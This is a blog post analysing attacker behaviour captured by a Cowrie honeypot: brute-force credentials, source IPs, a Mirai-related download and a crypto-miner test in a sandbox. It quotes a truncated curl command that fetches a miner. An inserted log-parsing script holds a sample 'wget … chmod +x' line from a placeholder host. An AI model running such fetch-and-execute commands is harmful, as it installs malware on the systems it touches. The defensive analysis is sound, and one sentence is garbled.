Behavior analysis on Honeypot

Grace Ko
4 min read · Oct 25, 2021

For this project, I set up the open-source Cowrie honeypot and collected 8 hours of traffic in the AWS Ohio region. I use hypotheses derived from IOCs (indicators of compromise) to build an analysis of attacker behavior, investigating source IP addresses, file hashes, and attack patterns.

COWRIE

Cowrie is a high-interaction SSH and Telnet honeypot designed to log brute-force attacks and shell interaction. It lures and traps attackers, and its log file can reveal the tactics, techniques, and procedures (TTPs) an attacker uses.

SETUP

I selected the AWS Ohio region for my honeypot. I chose Debian 10 Buster as the Amazon Machine Image and deployed the open-source T-Pot distribution, ‘telekom-security/tpotce’. The capture window ran from 10/18/2021 at 8 pm to 10/19/2021 at 4 am. In that time there were 835 attacks over SSH and Telnet from 31 unique IP addresses. Most attacks came from the United States, between 10 pm and 2 am. I also see some attacks from I will look into a few attackers.

ATTACKS

Attackers carried out SSH brute-force attacks with common usernames and passwords. The most used usernames were root and user: ‘root’ appeared 78 times and ‘user’ 27 times in the brute-force attempts. I filtered the log file to simplify the analysis of the incident. The following picture shows attacks originating from several different countries and using common usernames and passwords.

The list shows a high concentration of attacks from IP address 20.212.17.220 and evidence of common usernames and passwords being used.

The attacker tried to download a file, ‘drip-project.xyz’, onto the server. I submitted the file hash to virustotal.com to find out which malware family the hash is associated with. As the following picture shows, the file is related to the Mirai malware. According to Wikipedia, Mirai turns devices running Linux into remotely controlled bots that are used as part of a botnet in large-scale network attacks.
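The filtering described above can be scripted against Cowrie's own JSON log (one event per line). The following is an added example, not code from the original post or from the Cowrie project: it counts login attempts per username and per source IP and lists file downloads with their SHA-256 hashes so they can be looked up on VirusTotal. The log lines, IP addresses, URL and hash are constructed placeholders.

```python
import json
from collections import Counter

# Constructed Cowrie JSON log lines (cowrie.json format) with placeholder
# IPs (TEST-NET ranges), URL and hash; this is not real captured traffic.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"192.0.2.10","timestamp":"2021-10-19T02:01:10Z","session":"a1"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","src_ip":"192.0.2.10","timestamp":"2021-10-19T02:01:12Z","session":"a1"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","src_ip":"198.51.100.7","timestamp":"2021-10-19T02:05:00Z","session":"b2"}
{"eventid":"cowrie.login.success","username":"root","password":"root","src_ip":"192.0.2.10","timestamp":"2021-10-19T02:01:15Z","session":"a1"}
{"eventid":"cowrie.command.input","input":"wget http://203.0.113.5/drip-project.xyz; chmod +x drip-project.xyz","src_ip":"192.0.2.10","timestamp":"2021-10-19T02:01:20Z","session":"a1"}
{"eventid":"cowrie.session.file_download","url":"http://203.0.113.5/drip-project.xyz","shasum":"PLACEHOLDER_SHA256","src_ip":"192.0.2.10","timestamp":"2021-10-19T02:01:21Z","session":"a1"}
this line is deliberately not JSON and must be skipped
"""

def parse_events(text):
    """Parse one JSON object per line; skip blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events

def summarize(events):
    """Count login attempts per username and source IP; collect downloads and commands."""
    usernames, src_ips, downloads, commands = Counter(), Counter(), [], []
    for ev in events:
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            usernames[ev.get("username", "")] += 1
            src_ips[ev.get("src_ip", "")] += 1
        elif eid == "cowrie.session.file_download":
            # shasum is the SHA-256 Cowrie records for the stored artifact
            downloads.append((ev.get("src_ip"), ev.get("url"), ev.get("shasum")))
        elif eid == "cowrie.command.input":
            commands.append((ev.get("src_ip"), ev.get("input")))
    return {"usernames": usernames, "src_ips": src_ips,
            "downloads": downloads, "commands": commands}

if __name__ == "__main__":
    s = summarize(parse_events(SAMPLE_LOG))
    print("top usernames:", s["usernames"].most_common(3))
    print("top source IPs:", s["src_ips"].most_common(3))
    for ip, url, sha in s["downloads"]:
        print(f"download from {ip}: {url} sha256={sha} (look the hash up on VirusTotal)")
```

On a real T-Pot or Cowrie host, point `parse_events` at the contents of `cowrie.json` instead of `SAMPLE_LOG`.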

Multiple security vendors flagged the following IP addresses as malicious, according to virustotal.com.

209.141.56.75

199.19.226.61

212.193.30.101

We can find further information about the attacker.

Malware Analysis

The following log shows that an attacker from IP address 136.144.41.253 tried to download a malicious file. I checked it through virustotal.com and performed further analysis.

I tested the malware command “curl -s -L http://download.c3pool.com…” from the command-line input list. I used the SANS SIFT workstation to avoid accidentally executing live malware on my own machine. I fetched the malicious file with wget in my sandbox and disconnected the VM from the internet by disconnecting its network adapter, to prevent any further malicious activity. After I finished testing the malware, I deleted the VMware virtual machine.

The file failed to run, but we can still see the attack pattern of this crypto-mining malware: it removes the directories it created if it does not execute successfully.
